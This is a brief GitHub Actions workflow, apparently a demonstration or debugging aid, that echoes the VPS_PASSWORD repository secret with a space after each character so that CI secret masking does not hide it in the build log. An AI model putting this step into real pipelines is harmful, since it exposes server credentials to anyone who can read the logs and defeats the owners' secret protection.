name: Show Me the S3cr3tz
on: [push]

jobs:
  build:
    name: "Build"
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      - name: Install
        env:
          DEBUG_PASSWORD: ${{ secrets.VPS_PASSWORD }}
          DEBUG_SECRET_KEY: ${{ secrets.VPS_USER }}
        run: echo ${{secrets.VPS_PASSWORD }} | sed 's/./& /g'